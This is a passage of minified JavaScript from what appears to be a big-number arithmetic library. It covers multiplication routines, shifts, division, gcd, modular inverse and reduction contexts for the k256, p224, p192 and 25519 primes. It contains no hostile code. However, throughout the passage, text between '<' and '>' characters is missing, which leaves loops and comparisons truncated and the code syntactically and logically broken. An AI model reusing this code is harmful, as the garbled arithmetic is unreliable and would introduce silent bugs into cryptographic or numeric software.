yo=(X+(L=L+Math.imul(Z,ti)|0)|0)+((8191&(h=(h=h+Math.imul(Z,ii)|0)+Math.imul(ue,ti)|0))<<13)|0;X=((R=R+Math.imul(ue,ii)|0)+(h>>>13)|0)+(yo>>>26)|0,yo&=67108863,L=Math.imul(mt,pt),h=(h=Math.imul(mt,vt))+Math.imul(lt,pt)|0,R=Math.imul(lt,vt),L=L+Math.imul(Ge,Ft)|0,h=(h=h+Math.imul(Ge,zt)|0)+Math.imul(Qe,Ft)|0,R=R+Math.imul(Qe,zt)|0,L=L+Math.imul(me,Jt)|0,h=(h=h+Math.imul(me,Gt)|0)+Math.imul(Ke,Jt)|0,R=R+Math.imul(Ke,Gt)|0,L=L+Math.imul(De,jt)|0,h=(h=h+Math.imul(De,qt)|0)+Math.imul(Ve,jt)|0,R=R+Math.imul(Ve,qt)|0,L=L+Math.imul(He,Kt)|0,h=(h=h+Math.imul(He,Zt)|0)+Math.imul(Be,Kt)|0,R=R+Math.imul(Be,Zt)|0,L=L+Math.imul(Ae,ti)|0,h=(h=h+Math.imul(Ae,ii)|0)+Math.imul(Ue,ti)|0,R=R+Math.imul(Ue,ii)|0;var Vn=(X+(L=L+Math.imul(Z,Pt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Xt)|0)+Math.imul(ue,Pt)|0))<<13)|0;X=((R=R+Math.imul(ue,Xt)|0)+(h>>>13)|0)+(Vn>>>26)|0,Vn&=67108863,L=Math.imul(xe,pt),h=(h=Math.imul(xe,vt))+Math.imul(We,pt)|0,R=Math.imul(We,vt),L=L+Math.imul(mt,Ft)|0,h=(h=h+Math.imul(mt,zt)|0)+Math.imul(lt,Ft)|0,R=R+Math.imul(lt,zt)|0,L=L+Math.imul(Ge,Jt)|0,h=(h=h+Math.imul(Ge,Gt)|0)+Math.imul(Qe,Jt)|0,R=R+Math.imul(Qe,Gt)|0,L=L+Math.imul(me,jt)|0,h=(h=h+Math.imul(me,qt)|0)+Math.imul(Ke,jt)|0,R=R+Math.imul(Ke,qt)|0,L=L+Math.imul(De,Kt)|0,h=(h=h+Math.imul(De,Zt)|0)+Math.imul(Ve,Kt)|0,R=R+Math.imul(Ve,Zt)|0,L=L+Math.imul(He,ti)|0,h=(h=h+Math.imul(He,ii)|0)+Math.imul(Be,ti)|0,R=R+Math.imul(Be,ii)|0,L=L+Math.imul(Ae,Pt)|0,h=(h=h+Math.imul(Ae,Xt)|0)+Math.imul(Ue,Pt)|0,R=R+Math.imul(Ue,Xt)|0;var Eo=(X+(L=L+Math.imul(Z,Qt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,ei)|0)+Math.imul(ue,Qt)|0))<<13)|0;X=((R=R+Math.imul(ue,ei)|0)+(h>>>13)|0)+(Eo>>>26)|0,Eo&=67108863,L=Math.imul(Oe,pt),h=(h=Math.imul(Oe,vt))+Math.imul(Te,pt)|0,R=Math.imul(Te,vt),L=L+Math.imul(xe,Ft)|0,h=(h=h+Math.imul(xe,zt)|0)+Math.imul(We,Ft)|0,R=R+Math.imul(We,zt)|0,L=L+Math.imul(mt,Jt)|0,h=(h=h+Math.imul(mt,Gt)|0)+Math.imul(lt,Jt)|0,R=R+Math.imul(lt,Gt)|0,L=L+Math.imul(Ge,jt)|0,h=(h=h+Math.imul(Ge,qt)|0)+Math.imul(Qe,jt)|0,R=R+Math.imul(Qe,qt)|0,L=L+Math.imul(me,Kt)|0,h=(h=h+Math.imul(me,Zt)|0)+Math.imul(Ke,Kt)|0,R=R+Math.imul(Ke,Zt)|0,L=L+Math.imul(De,ti)|0,h=(h=h+Math.imul(De,ii)|0)+Math.imul(Ve,ti)|0,R=R+Math.imul(Ve,ii)|0,L=L+Math.imul(He,Pt)|0,h=(h=h+Math.imul(He,Xt)|0)+Math.imul(Be,Pt)|0,R=R+Math.imul(Be,Xt)|0,L=L+Math.imul(Ae,Qt)|0,h=(h=h+Math.imul(Ae,ei)|0)+Math.imul(Ue,Qt)|0,R=R+Math.imul(Ue,ei)|0;var Pn=(X+(L=L+Math.imul(Z,ai)|0)|0)+((8191&(h=(h=h+Math.imul(Z,$t)|0)+Math.imul(ue,ai)|0))<<13)|0;X=((R=R+Math.imul(ue,$t)|0)+(h>>>13)|0)+(Pn>>>26)|0,Pn&=67108863,L=Math.imul($e,pt),h=(h=Math.imul($e,vt))+Math.imul(st,pt)|0,R=Math.imul(st,vt),L=L+Math.imul(Oe,Ft)|0,h=(h=h+Math.imul(Oe,zt)|0)+Math.imul(Te,Ft)|0,R=R+Math.imul(Te,zt)|0,L=L+Math.imul(xe,Jt)|0,h=(h=h+Math.imul(xe,Gt)|0)+Math.imul(We,Jt)|0,R=R+Math.imul(We,Gt)|0,L=L+Math.imul(mt,jt)|0,h=(h=h+Math.imul(mt,qt)|0)+Math.imul(lt,jt)|0,R=R+Math.imul(lt,qt)|0,L=L+Math.imul(Ge,Kt)|0,h=(h=h+Math.imul(Ge,Zt)|0)+Math.imul(Qe,Kt)|0,R=R+Math.imul(Qe,Zt)|0,L=L+Math.imul(me,ti)|0,h=(h=h+Math.imul(me,ii)|0)+Math.imul(Ke,ti)|0,R=R+Math.imul(Ke,ii)|0,L=L+Math.imul(De,Pt)|0,h=(h=h+Math.imul(De,Xt)|0)+Math.imul(Ve,Pt)|0,R=R+Math.imul(Ve,Xt)|0,L=L+Math.imul(He,Qt)|0,h=(h=h+Math.imul(He,ei)|0)+Math.imul(Be,Qt)|0,R=R+Math.imul(Be,ei)|0,L=L+Math.imul(Ae,ai)|0,h=(h=h+Math.imul(Ae,$t)|0)+Math.imul(Ue,ai)|0,R=R+Math.imul(Ue,$t)|0;var lo=(X+(L=L+Math.imul(Z,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Yt)|0)+Math.imul(ue,Ut)|0))<<13)|0;X=((R=R+Math.imul(ue,Yt)|0)+(h>>>13)|0)+(lo>>>26)|0,lo&=67108863,L=Math.imul($e,Ft),h=(h=Math.imul($e,zt))+Math.imul(st,Ft)|0,R=Math.imul(st,zt),L=L+Math.imul(Oe,Jt)|0,h=(h=h+Math.imul(Oe,Gt)|0)+Math.imul(Te,Jt)|0,R=R+Math.imul(Te,Gt)|0,L=L+Math.imul(xe,jt)|0,h=(h=h+Math.imul(xe,qt)|0)+Math.imul(We,jt)|0,R=R+Math.imul(We,qt)|0,L=L+Math.imul(mt,Kt)|0,h=(h=h+Math.imul(mt,Zt)|0)+Math.imul(lt,Kt)|0,R=R+Math.imul(lt,Zt)|0,L=L+Math.imul(Ge,ti)|0,h=(h=h+Math.imul(Ge,ii)|0)+Math.imul(Qe,ti)|0,R=R+Math.imul(Qe,ii)|0,L=L+Math.imul(me,Pt)|0,h=(h=h+Math.imul(me,Xt)|0)+Math.imul(Ke,Pt)|0,R=R+Math.imul(Ke,Xt)|0,L=L+Math.imul(De,Qt)|0,h=(h=h+Math.imul(De,ei)|0)+Math.imul(Ve,Qt)|0,R=R+Math.imul(Ve,ei)|0,L=L+Math.imul(He,ai)|0,h=(h=h+Math.imul(He,$t)|0)+Math.imul(Be,ai)|0,R=R+Math.imul(Be,$t)|0;var ao=(X+(L=L+Math.imul(Ae,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Ae,Yt)|0)+Math.imul(Ue,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ue,Yt)|0)+(h>>>13)|0)+(ao>>>26)|0,ao&=67108863,L=Math.imul($e,Jt),h=(h=Math.imul($e,Gt))+Math.imul(st,Jt)|0,R=Math.imul(st,Gt),L=L+Math.imul(Oe,jt)|0,h=(h=h+Math.imul(Oe,qt)|0)+Math.imul(Te,jt)|0,R=R+Math.imul(Te,qt)|0,L=L+Math.imul(xe,Kt)|0,h=(h=h+Math.imul(xe,Zt)|0)+Math.imul(We,Kt)|0,R=R+Math.imul(We,Zt)|0,L=L+Math.imul(mt,ti)|0,h=(h=h+Math.imul(mt,ii)|0)+Math.imul(lt,ti)|0,R=R+Math.imul(lt,ii)|0,L=L+Math.imul(Ge,Pt)|0,h=(h=h+Math.imul(Ge,Xt)|0)+Math.imul(Qe,Pt)|0,R=R+Math.imul(Qe,Xt)|0,L=L+Math.imul(me,Qt)|0,h=(h=h+Math.imul(me,ei)|0)+Math.imul(Ke,Qt)|0,R=R+Math.imul(Ke,ei)|0,L=L+Math.imul(De,ai)|0,h=(h=h+Math.imul(De,$t)|0)+Math.imul(Ve,ai)|0,R=R+Math.imul(Ve,$t)|0;var bo=(X+(L=L+Math.imul(He,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(He,Yt)|0)+Math.imul(Be,Ut)|0))<<13)|0;X=((R=R+Math.imul(Be,Yt)|0)+(h>>>13)|0)+(bo>>>26)|0,bo&=67108863,L=Math.imul($e,jt),h=(h=Math.imul($e,qt))+Math.imul(st,jt)|0,R=Math.imul(st,qt),L=L+Math.imul(Oe,Kt)|0,h=(h=h+Math.imul(Oe,Zt)|0)+Math.imul(Te,Kt)|0,R=R+Math.imul(Te,Zt)|0,L=L+Math.imul(xe,ti)|0,h=(h=h+Math.imul(xe,ii)|0)+Math.imul(We,ti)|0,R=R+Math.imul(We,ii)|0,L=L+Math.imul(mt,Pt)|0,h=(h=h+Math.imul(mt,Xt)|0)+Math.imul(lt,Pt)|0,R=R+Math.imul(lt,Xt)|0,L=L+Math.imul(Ge,Qt)|0,h=(h=h+Math.imul(Ge,ei)|0)+Math.imul(Qe,Qt)|0,R=R+Math.imul(Qe,ei)|0,L=L+Math.imul(me,ai)|0,h=(h=h+Math.imul(me,$t)|0)+Math.imul(Ke,ai)|0,R=R+Math.imul(Ke,$t)|0;var $n=(X+(L=L+Math.imul(De,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(De,Yt)|0)+Math.imul(Ve,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ve,Yt)|0)+(h>>>13)|0)+($n>>>26)|0,$n&=67108863,L=Math.imul($e,Kt),h=(h=Math.imul($e,Zt))+Math.imul(st,Kt)|0,R=Math.imul(st,Zt),L=L+Math.imul(Oe,ti)|0,h=(h=h+Math.imul(Oe,ii)|0)+Math.imul(Te,ti)|0,R=R+Math.imul(Te,ii)|0,L=L+Math.imul(xe,Pt)|0,h=(h=h+Math.imul(xe,Xt)|0)+Math.imul(We,Pt)|0,R=R+Math.imul(We,Xt)|0,L=L+Math.imul(mt,Qt)|0,h=(h=h+Math.imul(mt,ei)|0)+Math.imul(lt,Qt)|0,R=R+Math.imul(lt,ei)|0,L=L+Math.imul(Ge,ai)|0,h=(h=h+Math.imul(Ge,$t)|0)+Math.imul(Qe,ai)|0,R=R+Math.imul(Qe,$t)|0;var Do=(X+(L=L+Math.imul(me,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(me,Yt)|0)+Math.imul(Ke,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ke,Yt)|0)+(h>>>13)|0)+(Do>>>26)|0,Do&=67108863,L=Math.imul($e,ti),h=(h=Math.imul($e,ii))+Math.imul(st,ti)|0,R=Math.imul(st,ii),L=L+Math.imul(Oe,Pt)|0,h=(h=h+Math.imul(Oe,Xt)|0)+Math.imul(Te,Pt)|0,R=R+Math.imul(Te,Xt)|0,L=L+Math.imul(xe,Qt)|0,h=(h=h+Math.imul(xe,ei)|0)+Math.imul(We,Qt)|0,R=R+Math.imul(We,ei)|0,L=L+Math.imul(mt,ai)|0,h=(h=h+Math.imul(mt,$t)|0)+Math.imul(lt,ai)|0,R=R+Math.imul(lt,$t)|0;var Mo=(X+(L=L+Math.imul(Ge,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Ge,Yt)|0)+Math.imul(Qe,Ut)|0))<<13)|0;X=((R=R+Math.imul(Qe,Yt)|0)+(h>>>13)|0)+(Mo>>>26)|0,Mo&=67108863,L=Math.imul($e,Pt),h=(h=Math.imul($e,Xt))+Math.imul(st,Pt)|0,R=Math.imul(st,Xt),L=L+Math.imul(Oe,Qt)|0,h=(h=h+Math.imul(Oe,ei)|0)+Math.imul(Te,Qt)|0,R=R+Math.imul(Te,ei)|0,L=L+Math.imul(xe,ai)|0,h=(h=h+Math.imul(xe,$t)|0)+Math.imul(We,ai)|0,R=R+Math.imul(We,$t)|0;var no=(X+(L=L+Math.imul(mt,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(mt,Yt)|0)+Math.imul(lt,Ut)|0))<<13)|0;X=((R=R+Math.imul(lt,Yt)|0)+(h>>>13)|0)+(no>>>26)|0,no&=67108863,L=Math.imul($e,Qt),h=(h=Math.imul($e,ei))+Math.imul(st,Qt)|0,R=Math.imul(st,ei),L=L+Math.imul(Oe,ai)|0,h=(h=h+Math.imul(Oe,$t)|0)+Math.imul(Te,ai)|0,R=R+Math.imul(Te,$t)|0;var Kn=(X+(L=L+Math.imul(xe,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(xe,Yt)|0)+Math.imul(We,Ut)|0))<<13)|0;X=((R=R+Math.imul(We,Yt)|0)+(h>>>13)|0)+(Kn>>>26)|0,Kn&=67108863,L=Math.imul($e,ai),h=(h=Math.imul($e,$t))+Math.imul(st,ai)|0,R=Math.imul(st,$t);var Sa=(X+(L=L+Math.imul(Oe,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Oe,Yt)|0)+Math.imul(Te,Ut)|0))<<13)|0;X=((R=R+Math.imul(Te,Yt)|0)+(h>>>13)|0)+(Sa>>>26)|0,Sa&=67108863;var ra=(X+(L=Math.imul($e,Ut))|0)+((8191&(h=(h=Math.imul($e,Yt))+Math.imul(st,Ut)|0))<<13)|0;return X=((R=Math.imul(st,Yt))+(h>>>13)|0)+(ra>>>26)|0,ra&=67108863,G[0]=ha,G[1]=Ha,G[2]=Va,G[3]=co,G[4]=io,G[5]=yo,G[6]=Vn,G[7]=Eo,G[8]=Pn,G[9]=lo,G[10]=ao,G[11]=bo,G[12]=$n,G[13]=Do,G[14]=Mo,G[15]=no,G[16]=Kn,G[17]=Sa,G[18]=ra,0!==X&&(G[19]=X,v.length++),v};function x(z,l,f){return(new S).mulp(z,l,f)}function S(z,l){this.x=z,this.y=l}Math.imul||(D=p),I.prototype.mulTo=function(l,f){var v,M=this.length+l.length;return v=10===this.length&&10===l.length?D(this,l,f):M<63?p(this,l,f):M<1024?function w(z,l,f){f.negative=l.negative^z.negative,f.length=z.length+l.length;for(var v=0,M=0,P=0;P>>26)|0)>>>26,G&=67108863}f.words[P]=X,v=G,G=M}return 0!==v?f.words[P]=v:f.length--,f.strip()}(this,l,f):x(this,l,f),v},S.prototype.makeRBT=function(l){for(var f=new Array(l),v=I.prototype._countBits(l)-1,M=0;M>=1;return M},S.prototype.permute=function(l,f,v,M,P,G){for(var X=0;X>>=1)P++;return 1<>>=13),P>>>=13;for(G=2*f;G>=26,f+=M/67108864|0,f+=P>>>26,this.words[v]=67108863&P}return 0!==f&&(this.words[v]=f,this.length++),this},I.prototype.muln=function(l){return this.clone().imuln(l)},I.prototype.sqr=function(){return this.mul(this)},I.prototype.isqr=function(){return this.imul(this.clone())},I.prototype.pow=function(l){var f=function A(z){for(var l=new Array(z.bitLength()),f=0;f>>M}return l}(l);if(0===f.length)return new I(1);for(var v=this,M=0;M=0);var P,f=l%26,v=(l-f)/26,M=67108863>>>26-f<<26-f;if(0!==f){var G=0;for(P=0;P>>26-f}G&&(this.words[P]=G,this.length++)}if(0!==v){for(P=this.length-1;P>=0;P--)this.words[P+v]=this.words[P];for(P=0;P=0),M=f?(f-f%26)/26:0;var P=l%26,G=Math.min((l-P)/26,this.length),X=67108863^67108863>>>P<G)for(this.length-=G,h=0;h=0&&(0!==R||h>=M);h--){var J=0|this.words[h];this.words[h]=R<<26-P|J>>>P,R=J&X}return L&&0!==R&&(L.words[L.length++]=R),0===this.length&&(this.words[0]=0,this.length=1),this.strip()},I.prototype.ishrn=function(l,f,v){return Q(0===this.negative),this.iushrn(l,f,v)},I.prototype.shln=function(l){return this.clone().ishln(l)},I.prototype.ushln=function(l){return this.clone().iushln(l)},I.prototype.shrn=function(l){return this.clone().ishrn(l)},I.prototype.ushrn=function(l){return this.clone().iushrn(l)},I.prototype.testn=function(l){Q("number"==typeof l&&l>=0);var f=l%26,v=(l-f)/26;return!(this.length<=v||!(this.words[v]&1<=0);var f=l%26,v=(l-f)/26;return Q(0===this.negative,"imaskn works only with positive numbers"),this.length<=v?this:(0!==f&&v++,this.length=Math.min(v,this.length),0!==f&&(this.words[this.length-1]&=67108863^67108863>>>f<=67108864;f++)this.words[f]-=67108864,f===this.length-1?this.words[f+1]=1:this.words[f+1]++;return this.length=Math.max(this.length,f+1),this},I.prototype.isubn=function(l){if(Q("number"==typeof l),Q(l<67108864),l<0)return this.iaddn(-l);if(0!==this.negative)return this.negative=0,this.iaddn(l),this.negative=1,this;if(this.words[0]-=l,1===this.length&&this.words[0]<0)this.words[0]=-this.words[0],this.negative=1;else for(var f=0;f>26)-(L/67108864|0),this.words[P+v]=67108863&G}for(;P>26,this.words[P+v]=67108863&G;if(0===X)return this.strip();for(Q(-1===X),X=0,P=0;P>26,this.words[P]=67108863&G;return this.negative=1,this.strip()},I.prototype._wordDiv=function(l,f){var v,M=this.clone(),P=l,G=0|P.words[P.length-1];0!=(v=26-this._countBits(G))&&(P=P.ushln(v),M.iushln(v),G=0|P.words[P.length-1]);var h,L=M.length-P.length;if("mod"!==f){(h=new I(null)).length=L+1,h.words=new Array(h.length);for(var R=0;R=0;Z--){var ue=67108864*(0|M.words[P.length+Z])+(0|M.words[P.length+Z-1]);for(ue=Math.min(ue/G|0,67108863),M._ishlnsubmul(P,ue,Z);0!==M.negative;)ue--,M.negative=0,M._ishlnsubmul(P,1,Z),M.isZero()||(M.negative^=1);h&&(h.words[Z]=ue)}return h&&h.strip(),M.strip(),"div"!==f&&0!==v&&M.iushrn(v),{div:h||null,mod:M}},I.prototype.divmod=function(l,f,v){return Q(!l.isZero()),this.isZero()?{div:new I(0),mod:new I(0)}:0!==this.negative&&0===l.negative?(G=this.neg().divmod(l,f),"mod"!==f&&(M=G.div.neg()),"div"!==f&&(P=G.mod.neg(),v&&0!==P.negative&&P.iadd(l)),{div:M,mod:P}):0===this.negative&&0!==l.negative?(G=this.divmod(l.neg(),f),"mod"!==f&&(M=G.div.neg()),{div:M,mod:G.mod}):0!=(this.negative&l.negative)?(G=this.neg().divmod(l.neg(),f),"div"!==f&&(P=G.mod.neg(),v&&0!==P.negative&&P.isub(l)),{div:G.div,mod:P}):l.length>this.length||this.cmp(l)<0?{div:new I(0),mod:this}:1===l.length?"div"===f?{div:this.divn(l.words[0]),mod:null}:"mod"===f?{div:null,mod:new I(this.modn(l.words[0]))}:{div:this.divn(l.words[0]),mod:new I(this.modn(l.words[0]))}:this._wordDiv(l,f);var M,P,G},I.prototype.div=function(l){return this.divmod(l,"div",!1).div},I.prototype.mod=function(l){return this.divmod(l,"mod",!1).mod},I.prototype.umod=function(l){return this.divmod(l,"mod",!0).mod},I.prototype.divRound=function(l){var f=this.divmod(l);if(f.mod.isZero())return f.div;var v=0!==f.div.negative?f.mod.isub(l):f.mod,M=l.ushrn(1),P=l.andln(1),G=v.cmp(M);return G<0||1===P&&0===G?f.div:0!==f.div.negative?f.div.isubn(1):f.div.iaddn(1)},I.prototype.modn=function(l){Q(l<=67108863);for(var f=(1<<26)%l,v=0,M=this.length-1;M>=0;M--)v=(f*v+(0|this.words[M]))%l;return v},I.prototype.idivn=function(l){Q(l<=67108863);for(var f=0,v=this.length-1;v>=0;v--){var M=(0|this.words[v])+67108864*f;this.words[v]=M/l|0,f=M%l}return this.strip()},I.prototype.divn=function(l){return this.clone().idivn(l)},I.prototype.egcd=function(l){Q(0===l.negative),Q(!l.isZero());var f=this,v=l.clone();f=0!==f.negative?f.umod(l):f.clone();for(var M=new I(1),P=new I(0),G=new I(0),X=new I(1),L=0;f.isEven()&&v.isEven();)f.iushrn(1),v.iushrn(1),++L;for(var h=v.clone(),R=f.clone();!f.isZero();){for(var J=0,Z=1;0==(f.words[0]&Z)&&J<26;++J,Z<<=1);if(J>0)for(f.iushrn(J);J-- >0;)(M.isOdd()||P.isOdd())&&(M.iadd(h),P.isub(R)),M.iushrn(1),P.iushrn(1);for(var ue=0,Ie=1;0==(v.words[0]&Ie)&&ue<26;++ue,Ie<<=1);if(ue>0)for(v.iushrn(ue);ue-- >0;)(G.isOdd()||X.isOdd())&&(G.iadd(h),X.isub(R)),G.iushrn(1),X.iushrn(1);f.cmp(v)>=0?(f.isub(v),M.isub(G),P.isub(X)):(v.isub(f),G.isub(M),X.isub(P))}return{a:G,b:X,gcd:v.iushln(L)}},I.prototype._invmp=function(l){Q(0===l.negative),Q(!l.isZero());var J,f=this,v=l.clone();f=0!==f.negative?f.umod(l):f.clone();for(var M=new I(1),P=new I(0),G=v.clone();f.cmpn(1)>0&&v.cmpn(1)>0;){for(var X=0,L=1;0==(f.words[0]&L)&&X<26;++X,L<<=1);if(X>0)for(f.iushrn(X);X-- >0;)M.isOdd()&&M.iadd(G),M.iushrn(1);for(var h=0,R=1;0==(v.words[0]&R)&&h<26;++h,R<<=1);if(h>0)for(v.iushrn(h);h-- >0;)P.isOdd()&&P.iadd(G),P.iushrn(1);f.cmp(v)>=0?(f.isub(v),M.isub(P)):(v.isub(f),P.isub(M))}return(J=0===f.cmpn(1)?M:P).cmpn(0)<0&&J.iadd(l),J},I.prototype.gcd=function(l){if(this.isZero())return l.abs();if(l.isZero())return this.abs();var f=this.clone(),v=l.clone();f.negative=0,v.negative=0;for(var M=0;f.isEven()&&v.isEven();M++)f.iushrn(1),v.iushrn(1);for(;;){for(;f.isEven();)f.iushrn(1);for(;v.isEven();)v.iushrn(1);var P=f.cmp(v);if(P<0){var G=f;f=v,v=G}else if(0===P||0===v.cmpn(1))break;f.isub(v)}return v.iushln(M)},I.prototype.invm=function(l){return this.egcd(l).a.umod(l)},I.prototype.isEven=function(){return 0==(1&this.words[0])},I.prototype.isOdd=function(){return 1==(1&this.words[0])},I.prototype.andln=function(l){return this.words[0]&l},I.prototype.bincn=function(l){Q("number"==typeof l);var f=l%26,v=(l-f)/26,M=1<>>26,this.words[G]=X&=67108863}return 0!==P&&(this.words[G]=P,this.length++),this},I.prototype.isZero=function(){return 1===this.length&&0===this.words[0]},I.prototype.cmpn=function(l){var v,f=l<0;if(0!==this.negative&&!f)return-1;if(0===this.negative&&f)return 1;if(this.strip(),this.length>1)v=1;else{f&&(l=-l),Q(l<=67108863,"Number is too big");var M=0|this.words[0];v=M===l?0:Ml.length)return 1;if(this.length=0;v--){var M=0|this.words[v],P=0|l.words[v];if(M!==P){MP&&(f=1);break}}return f},I.prototype.gtn=function(l){return 1===this.cmpn(l)},I.prototype.gt=function(l){return 1===this.cmp(l)},I.prototype.gten=function(l){return this.cmpn(l)>=0},I.prototype.gte=function(l){return this.cmp(l)>=0},I.prototype.ltn=function(l){return-1===this.cmpn(l)},I.prototype.lt=function(l){return-1===this.cmp(l)},I.prototype.lten=function(l){return this.cmpn(l)<=0},I.prototype.lte=function(l){return this.cmp(l)<=0},I.prototype.eqn=function(l){return 0===this.cmpn(l)},I.prototype.eq=function(l){return 0===this.cmp(l)},I.red=function(l){return new le(l)},I.prototype.toRed=function(l){return Q(!this.red,"Already a number in reduction context"),Q(0===this.negative,"red works only with positives"),l.convertTo(this)._forceRed(l)},I.prototype.fromRed=function(){return Q(this.red,"fromRed works only with numbers in reduction context"),this.red.convertFrom(this)},I.prototype._forceRed=function(l){return this.red=l,this},I.prototype.forceRed=function(l){return Q(!this.red,"Already a number in reduction context"),this._forceRed(l)},I.prototype.redAdd=function(l){return Q(this.red,"redAdd works only with red numbers"),this.red.add(this,l)},I.prototype.redIAdd=function(l){return Q(this.red,"redIAdd works only with red numbers"),this.red.iadd(this,l)},I.prototype.redSub=function(l){return Q(this.red,"redSub works only with red numbers"),this.red.sub(this,l)},I.prototype.redISub=function(l){return Q(this.red,"redISub works only with red numbers"),this.red.isub(this,l)},I.prototype.redShl=function(l){return Q(this.red,"redShl works only with red numbers"),this.red.shl(this,l)},I.prototype.redMul=function(l){return Q(this.red,"redMul works only with red numbers"),this.red._verify2(this,l),this.red.mul(this,l)},I.prototype.redIMul=function(l){return Q(this.red,"redMul works only with red numbers"),this.red._verify2(this,l),this.red.imul(this,l)},I.prototype.redSqr=function(){return Q(this.red,"redSqr works only with red numbers"),this.red._verify1(this),this.red.sqr(this)},I.prototype.redISqr=function(){return Q(this.red,"redISqr works only with red numbers"),this.red._verify1(this),this.red.isqr(this)},I.prototype.redSqrt=function(){return Q(this.red,"redSqrt works only with red numbers"),this.red._verify1(this),this.red.sqrt(this)},I.prototype.redInvm=function(){return Q(this.red,"redInvm works only with red numbers"),this.red._verify1(this),this.red.invm(this)},I.prototype.redNeg=function(){return Q(this.red,"redNeg works only with red numbers"),this.red._verify1(this),this.red.neg(this)},I.prototype.redPow=function(l){return Q(this.red&&!l.red,"redPow(normalNum)"),this.red._verify1(this),this.red.pow(this,l)};var O={k256:null,p224:null,p192:null,p25519:null};function B(z,l){this.name=z,this.p=new I(l,16),this.n=this.p.bitLength(),this.k=new I(1).iushln(this.n).isub(this.p),this.tmp=this._tmp()}function K(){B.call(this,"k256","ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffe fffffc2f")}function ee(){B.call(this,"p224","ffffffff ffffffff ffffffff ffffffff 00000000 00000000 00000001")}function se(){B.call(this,"p192","ffffffff ffffffff ffffffff fffffffe ffffffff ffffffff")}function ve(){B.call(this,"25519","7fffffffffffffff ffffffffffffffff ffffffffffffffff ffffffffffffffed")}function le(z){if("string"==typeof z){var l=I._prime(z);this.m=l.p,this.prime=l}else Q(z.gtn(1),"modulus must be greater than 1"),this.m=z,this.prime=null}function ye(z){le.call(this,z),this.shift=this.m.bitLength(),this.shift%26!=0&&(this.shift+=26-this.shift%26),this.r=new I(1).iushln(this.shift),this.r2=this.imod(this.r.sqr()),this.rinv=this.r._invmp(this.m),this.minv=this.rinv.mul(this.r).isubn(1).div(this.m),this.minv=this.minv.umod(this.r),this.minv=this.r.sub(this.minv)}B.prototype._tmp=function(){var l=new I(null);return l.words=new Array(Math.ceil(this.n/13)),l},B.prototype.ireduce=function(l){var v,f=l;do{this.split(f,this.tmp),v=(f=(f=this.imulK(f)).iadd(this.tmp)).bitLength()}while(v>this.n);var M=v0?f.isub(this.p):void 0!==f.strip?f.strip():f._strip(),f},B.prototype.split=function(l,f){l.iushrn(this.n,0,f)},B.prototype.imulK=function(l){return l.imul(this.k)},ae(K,B),K.prototype.split=function(l,f){for(var v=4194303,M=Math.min(l.length,9),P=0;P>>22,G=X}l.words[P-10]=G>>>=22,l.length-=0===G&&l.length>10?10:9},K.prototype.imulK=function(l){l.words[l.length]=0,l.words[l.length+1]=0,l.length+=2;for(var f=0,v=0;v>>=26,l.words[v]=P,f=M}return 0!==f&&(l.words[l.length++]=f),l},I._prime=function(l){if(O[l])return O[l];var f;if("k256"===l)f=new K;else if("p224"===l)f=new ee;else if("p192"===l)f=new se;else{if("p25519"!==l)throw new Error("Unknown prime "+l);f=new ve}return O[l]=f,f},le.prototype._verify1=function(l){Q(0===l.negative,"red works only with positives"),Q(l.red,"red works only with red numbers")},le.prototype._verify2=function(l,f){Q(0==(l.negative|f.negative),"red works only with positives"),Q(l.red&&l.red===f.red,"red works only with red numbers")},le.prototype.imod=function(l){return this.prime?this.prime.ireduce(l)._forceRed(this):l.umod(this.m)._forceRed(this)},le.prototype.neg=function(l){return l.isZero()?l.clone():this.m.sub(l)._forceRed(this)},le.prototype.add=function(l,f){this._verify2(l,f);var v=l.add(f);return v.cmp(this.m)>=0&&v.isub(this.m),v._forceRed(this)},le.prototype.iadd=function(l,f){this._verify2(l,f);var v=l.iadd(f);return v.cmp(this.m)>=0&&v.isub(this.m),v},le.prototype.sub=function(l,f){this._verify2(l,f);var v=l.sub(f);return v.cmpn(0)<0&&v.iadd(this.m),v._forceRed(this)},le.prototype.isub=function(l,f){this._verify2(l,f);var v=l.isub(f);return v.cmpn(0)<0&&v.iadd(this.m),v},le.prototype.shl=function(l,f){return this._verify1(l),this.imod(l.ushln(f))},le.prototype.imul=function(l,f){return this._verify2(l,f),this.imod(l.imul(f))},le.prototype.mul=function(l,f){return this._verify2(l,f),this.imod(l.mul(f))},le.prototype.isqr=function(l){return this.imul(l,l.clone())},le.prototype.sqr=function(l){return this.mul(l,l)},le.prototype.sqrt=function(l){if(l.isZero())return l.clone();var f=this.m.andln(3);if(Q(f%2==1),3===f){var v=this.m.add(new I(1)).iushrn(2);return this.pow(l,v)}for(var M=this.m.subn(1),P=0;!M.isZero()&&0===M.andln(1);)P++,M.iushrn(1);Q(!M.isZero());var G=new I(1).toRed(this),X=G.redNeg(),L=this.m.subn(1).iushrn(1),h=this.m.bitLength();for(h=new I(2*h*h).toRed(this);0!==this.pow(h,L).cmp(X);)h.redIAdd(X);for(var R=this.pow(h,M),J=this.pow(l,M.addn(1).iushrn(1)),Z=this.pow(l,M),ue=P;0!==Z.cmp(G);){for(var Ie=Z,Ae=0;0!==Ie.cmp(G);Ae++)Ie=Ie.redSqr();Q(Ae=0;P--){for(var R=f.words[P],J=h-1;J>=0;J--){var Z=R>>J&1;G!==M[0]&&(G=this.sqr(G)),0!==Z||0!==X?(X<<=1,X|=Z,(4==++L||0===P&&0===J)&&(G=this.mul(G,M[X]),L=0,X=0)):L=0}h=26}return G},le.prototype.convertTo=function(l){var f=l.umod(this.m);return f===l?f.clone():f},le.prototype.convertFrom=function(l){var f=l.clone();return f.red=null,f},I.mont=function(l){return new ye(l)},ae(ye,le),ye.prototype.convertTo=function(l){return this.imod(l.ushln(this.shift))},ye.prototype.convertFrom=function(l){var f=this.imod(l.mul(this.rinv));return 